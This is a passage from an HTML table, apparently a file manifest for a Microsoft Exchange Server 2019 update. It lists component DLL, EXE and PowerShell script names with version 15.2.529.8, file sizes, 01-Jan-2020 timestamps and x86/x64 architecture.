r><td>Microsoft.exchange.server.storage.storecommonservices.dll</td><td>15.2.529.8</td><td>1,018,752</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.storeintegritycheck.dll</td><td>15.2.529.8</td><td>111,480</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.workermanager.dll</td><td>15.2.529.8</td><td>34,680</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.xpress.dll</td><td>15.2.529.8</td><td>19,320</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.servicehost.eventlog.dll</td><td>15.2.529.8</td><td>14,944</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.servicehost.exe</td><td>15.2.529.8</td><td>60,792</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.servicelets.globallocatorcache.dll</td><td>15.2.529.8</td><td>50,768</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.servicelets.globalloc
atorcache.eventlog.dll</td><td>15.2.529.8</td><td>14,208</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll</td><td>15.2.529.8</td><td>14,208</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.services.common.dll</td><td>15.2.529.8</td><td>74,104</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.dll</td><td>15.2.529.8</td><td>8,494,152</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.eventlogs.dll</td><td>15.2.529.8</td><td>30,072</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.services.ewshandler.dll</td><td>15.2.529.8</td><td>633,728</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.ewsserialization.dll</td><td>15.2.529.8</td><td>1,651,280</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.json.dll</td><td>15.2.529.8</td><td>296,520</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.messaging.dll</td><td>15.2.529.8</td><td>43,384</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.onlinemeetings.dll</td><td>15.2.529.8</td><td>233,336</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.surface.dll</td><td>15.2.529.8</td><td>178,552</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.wcf.dll</td><td>15.2.529.8</td><td>348,536</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.acquirelanguagepack.dll</td><td>15.2.529.8</td><td>56,696</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.bootstrapper.common.dll</td><td>15.2.529.8</td><td>93,056</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.common
.dll</td><td>15.2.529.8</td><td>296,312</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.commonbase.dll</td><td>15.2.529.8</td><td>35,704</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.console.dll</td><td>15.2.529.8</td><td>27,216</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.gui.dll</td><td>15.2.529.8</td><td>114,784</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.parser.dll</td><td>15.2.529.8</td><td>53,624</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.signverfwrapper.dll</td><td>15.2.529.8</td><td>75,128</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.sharedcache.caches.dll</td><td>15.2.529.8</td><td>142,720</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.sharedcache.client.dll</td><td>15.2.529.8</td><td>24,960</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.sharedcache.eventlog.dll</td><td>15.2.529.8</td><td>15,232</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.sharedcache.exe</td><td>15.2.529.8</td><td>58,744</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.sharepointsignalstore.dll</td><td>15.2.529.8</td><td>27,000</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.slabmanifest.dll</td><td>15.2.529.8</td><td>47,184</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.sqm.dll</td><td>15.2.529.8</td><td>46,968</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.store.service.exe</td><td>15.2.529.8</td><td>28,232</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.store.worker.exe</td><td>15.2.529.8</td><td>26,488</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Mi
crosoft.exchange.storeobjectsservice.eventlog.dll</td><td>15.2.529.8</td><td>13,904</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.storeobjectsservice.exe</td><td>15.2.529.8</td><td>31,608</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.storeprovider.dll</td><td>15.2.529.8</td><td>1,205,112</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.structuredquery.dll</td><td>15.2.529.8</td><td>158,800</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.symphonyhandler.dll</td><td>15.2.529.8</td><td>628,096</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.syncmigration.eventlog.dll</td><td>15.2.529.8</td><td>13,176</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.syncmigrationservicelet.dll</td><td>15.2.529.8</td><td>16,248</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.systemprobemsg.dll</td><td>15.2.529.8</td><td>13,392</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.textprocessing.dll</td><td>15.2.529.8</td><td>221,776</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.textprocessing.eventlog.dll</td><td>15.2.529.8</td><td>13,696</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.agent.addressbookpolicyroutingagent.dll</td><td>15.2.529.8</td><td>29,256</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.antispam.common.dll</td><td>15.2.529.8</td><td>138,624</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.contentfilter.cominterop.dll</td><td>15.2.529.8</td><td>21,888</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.controlflow.dll</td><td>15.2.529.8</td><td>40,320</td><td>01-Jan-2020</td><td>11:20</
td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.faultinjectionagent.dll</td><td>15.2.529.8</td><td>22,904</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.frontendproxyagent.dll</td><td>15.2.529.8</td><td>21,376</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.hygiene.dll</td><td>15.2.529.8</td><td>212,344</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.interceptoragent.dll</td><td>15.2.529.8</td><td>98,680</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.liveidauth.dll</td><td>15.2.529.8</td><td>22,912</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.malware.dll</td><td>15.2.529.8</td><td>169,344</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.malware.eventlog.dll</td><td>15.2.529.8</td><td>18,304</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.agent.phishingdetection.dll</td><td>15.2.529.8</td><td>21,064</td><td>01-Jan-2020</td><td>11:24</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.prioritization.dll</td><td>15.2.529.8</td><td>31,824</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.protocolanalysis.dbaccess.dll</td><td>15.2.529.8</td><td>47,176</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.search.dll</td><td>15.2.529.8</td><td>30,072</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.senderid.core.dll</td><td>15.2.529.8</td><td>53,120</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll</td><td>15.2.529.8</td><td>44,928</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td>
</tr><tr><td>Microsoft.exchange.transport.agent.systemprobedrop.dll</td><td>15.2.529.8</td><td>18,504</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.transportfeatureoverrideagent.dll</td><td>15.2.529.8</td><td>46,456</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.trustedmailagents.dll</td><td>15.2.529.8</td><td>46,664</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.cloudmonitor.common.dll</td><td>15.2.529.8</td><td>28,024</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.common.dll</td><td>15.2.529.8</td><td>457,088</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.contracts.dll</td><td>15.2.529.8</td><td>18,504</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.decisionengine.dll</td><td>15.2.529.8</td><td>30,584</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.dll</td><td>15.2.529.8</td><td>4,183,928</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.dsapiclient.dll</td><td>15.2.529.8</td><td>182,144</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.eventlog.dll</td><td>15.2.529.8</td><td>121,728</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.extensibility.dll</td><td>15.2.529.8</td><td>404,040</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.extensibilityeventlog.dll</td><td>15.2.529.8</td><td>14,712</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.flighting.dll</td><td>15.2.529.8</td><td>90,192</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.logging.dll</td><td>15.2.529.8</td><td>89,160</td><td>01-Jan
-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.logging.search.dll</td><td>15.2.529.8</td><td>68,472</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.loggingcommon.dll</td><td>15.2.529.8</td><td>63,360</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.monitoring.dll</td><td>15.2.529.8</td><td>430,664</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.net.dll</td><td>15.2.529.8</td><td>122,232</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.protocols.contracts.dll</td><td>15.2.529.8</td><td>17,992</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.protocols.dll</td><td>15.2.529.8</td><td>29,056</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.protocols.httpsubmission.dll</td><td>15.2.529.8</td><td>60,792</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.requestbroker.dll</td><td>15.2.529.8</td><td>50,256</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.scheduler.contracts.dll</td><td>15.2.529.8</td><td>33,144</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.scheduler.dll</td><td>15.2.529.8</td><td>113,016</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.smtpshared.dll</td><td>15.2.529.8</td><td>18,304</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.storage.contracts.dll</td><td>15.2.529.8</td><td>52,088</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.storage.dll</td><td>15.2.529.8</td><td>675,400</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.storage.management.dll</td><td>15.2.529.8</td><t
d>23,936</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.agents.dll</td><td>15.2.529.8</td><td>17,792</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.common.dll</td><td>15.2.529.8</td><td>487,288</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.common.eventlog.dll</td><td>15.2.529.8</td><td>12,672</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.sync.manager.dll</td><td>15.2.529.8</td><td>306,256</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.manager.eventlog.dll</td><td>15.2.529.8</td><td>15,744</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.sync.migrationrpc.dll</td><td>15.2.529.8</td><td>46,456</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.worker.dll</td><td>15.2.529.8</td><td>1,044,560</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.worker.eventlog.dll</td><td>15.2.529.8</td><td>15,432</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.transportlogsearch.eventlog.dll</td><td>15.2.529.8</td><td>18,808</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.transportsyncmanagersvc.exe</td><td>15.2.529.8</td><td>19,024</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.troubleshootingtool.shared.dll</td><td>15.2.529.8</td><td>118,856</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.umcommon.dll</td><td>15.2.529.8</td><td>924,536</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.umcore.dll</td><td>15.2.529.8</td><td>1,466,744</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.umvariantconfiguratio
n.dll</td><td>15.2.529.8</td><td>32,640</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedcontent.dll</td><td>15.2.529.8</td><td>41,848</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedcontent.exchange.dll</td><td>15.2.529.8</td><td>25,168</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedpolicyfilesync.eventlog.dll</td><td>15.2.529.8</td><td>15,224</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.unifiedpolicyfilesyncservicelet.dll</td><td>15.2.529.8</td><td>83,320</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedpolicysyncservicelet.dll</td><td>15.2.529.8</td><td>50,040</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.antispam.dll</td><td>15.2.529.8</td><td>642,432</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.core.dll</td><td>15.2.529.8</td><td>186,232</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.dll</td><td>15.2.529.8</td><td>67,456</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.eventlog.dll</td><td>15.2.529.8</td><td>12,872</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.variantconfiguration.excore.dll</td><td>15.2.529.8</td><td>56,696</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.globalsettings.dll</td><td>15.2.529.8</td><td>27,512</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.hygiene.dll</td><td>15.2.529.8</td><td>120,912</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.protectionservice.dll</td><td>15.2.529.8</td><td>31,608</td><td>01-Jan-2020</td><td>
11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.threatintel.dll</td><td>15.2.529.8</td><td>57,208</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.webservices.auth.dll</td><td>15.2.529.8</td><td>35,920</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.webservices.dll</td><td>15.2.529.8</td><td>1,054,288</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.webservices.xrm.dll</td><td>15.2.529.8</td><td>68,176</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.wlmservicelet.dll</td><td>15.2.529.8</td><td>23,632</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.wopiclient.dll</td><td>15.2.529.8</td><td>77,392</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.workingset.signalapi.dll</td><td>15.2.529.8</td><td>17,272</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.workingsetabstraction.signalapiabstraction.dll</td><td>15.2.529.8</td><td>29,048</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.workloadmanagement.dll</td><td>15.2.529.8</td><td>505,424</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.workloadmanagement.eventlogs.dll</td><td>15.2.529.8</td><td>14,928</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.workloadmanagement.throttling.configuration.dll</td><td>15.2.529.8</td><td>36,736</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.workloadmanagement.throttling.dll</td><td>15.2.529.8</td><td>66,432</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.fast.contextlogger.json.dll</td><td>15.2.529.8</td><td>19,536</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.filtering.dll</td><td>15.2.529.8</td><td>113,224</td><td>01-Jan-2020</td><td>11:21</td>
<td>x86</td></tr><tr><td>Microsoft.filtering.exchange.dll</td><td>15.2.529.8</td><td>57,208</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.filtering.interop.dll</td><td>15.2.529.8</td><td>15,432</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.forefront.activedirectoryconnector.dll</td><td>15.2.529.8</td><td>47,176</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.forefront.activedirectoryconnector.eventlog.dll</td><td>15.2.529.8</td><td>15,952</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.forefront.filtering.common.dll</td><td>15.2.529.8</td><td>23,936</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.forefront.filtering.diagnostics.dll</td><td>15.2.529.8</td><td>22,608</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.forefront.filtering.eventpublisher.dll</td><td>15.2.529.8</td><td>34,680</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.forefront.management.powershell.format.ps1xml</td><td>Not applicable</td><td>48,898</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Microsoft.forefront.management.powershell.types.ps1xml</td><td>Not applicable</td><td>16,274</td><td>01-Jan-2020</td><td>11:21</td><td>Not 
applicable</td></tr><tr><td>Microsoft.forefront.monitoring.activemonitoring.local.components.dll</td><td>15.2.529.8</td><td>1,518,456</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.forefront.monitoring.activemonitoring.local.components.messages.dll</td><td>15.2.529.8</td><td>13,176</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.forefront.monitoring.management.outsidein.dll</td><td>15.2.529.8</td><td>33,360</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.forefront.recoveryactionarbiter.contract.dll</td><td>15.2.529.8</td><td>18,296</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.forefront.reporting.common.dll</td><td>15.2.529.8</td><td>46,456</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.forefront.reporting.ondemandquery.dll</td><td>15.2.529.8</td><td>50,560</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.isam.esent.collections.dll</td><td>15.2.529.8</td><td>72,568</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.isam.esent.interop.dll</td><td>15.2.529.8</td><td>541,560</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.managementgui.dll</td><td>15.2.529.8</td><td>133,712</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.mce.interop.dll</td><td>15.2.529.8</td><td>24,440</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.office.audit.dll</td><td>15.2.529.8</td><td>125,008</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.office.client.discovery.unifiedexport.dll</td><td>15.2.529.8</td><td>593,280</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.office.common.ipcommonlogger.dll</td><td>15.2.529.8</td><td>42,368</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.console.core.dll</td><td>15.2.529.8</td><td>217,976</td><td>01-Jan-2020</td><td>11:
20</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.console.dll</td><td>15.2.529.8</td><td>854,904</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.console.extensions.dll</td><td>15.2.529.8</td><td>485,968</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.core.dll</td><td>15.2.529.8</td><td>413,056</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.ingestion.dll</td><td>15.2.529.8</td><td>36,224</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.office.compliancepolicy.exchange.dar.dll</td><td>15.2.529.8</td><td>84,856</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.office.compliancepolicy.platform.dll</td><td>15.2.529.8</td><td>1,782,136</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.office.datacenter.activemonitoring.management.common.dll</td><td>15.2.529.8</td><td>49,536</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.office.datacenter.activemonitoring.management.dll</td><td>15.2.529.8</td><td>27,720</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.office.datacenter.activemonitoringlocal.dll</td><td>15.2.529.8</td><td>174,968</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.office.datacenter.monitoring.activemonitoring.recovery.dll</td><td>15.2.529.8</td><td>166,472</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.office365.datainsights.uploader.dll</td><td>15.2.529.8</td><td>40,528</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.online.box.shell.dll</td><td>15.2.529.8</td><td>46,456</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.powershell.hostingtools.dll</td><td>15.2.529.8</td><td>68,176</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.powershell.hostingtools_2.dll</td><td>15.2.529.8</td><td
>68,176</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.tailoredexperiences.core.dll</td><td>15.2.529.8</td><td>120,184</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Migrateumcustomprompts.ps1</td><td>Not applicable</td><td>19,106</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Modernpublicfoldertomailboxmapgenerator.ps1</td><td>Not applicable</td><td>29,348</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Movemailbox.ps1</td><td>Not applicable</td><td>61,116</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Movetransportdatabase.ps1</td><td>Not applicable</td><td>30,586</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Move_publicfolderbranch.ps1</td><td>Not applicable</td><td>17,520</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Mpgearparser.dll</td><td>15.2.529.8</td><td>99,912</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Msclassificationadapter.dll</td><td>15.2.529.8</td><td>248,912</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Msexchangecompliance.exe</td><td>15.2.529.8</td><td>78,712</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Msexchangedagmgmt.exe</td><td>15.2.529.8</td><td>25,672</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Msexchangedelivery.exe</td><td>15.2.529.8</td><td>38,992</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Msexchangefrontendtransport.exe</td><td>15.2.529.8</td><td>31,824</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Msexchangehmhost.exe</td><td>15.2.529.8</td><td>27,208</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Msexchangehmrecovery.exe</td><td>15.2.529.8</td><td>29,792</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Msexchangemailboxassistants.exe</td><td>15.2.529.8</td><td>72,568</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr>
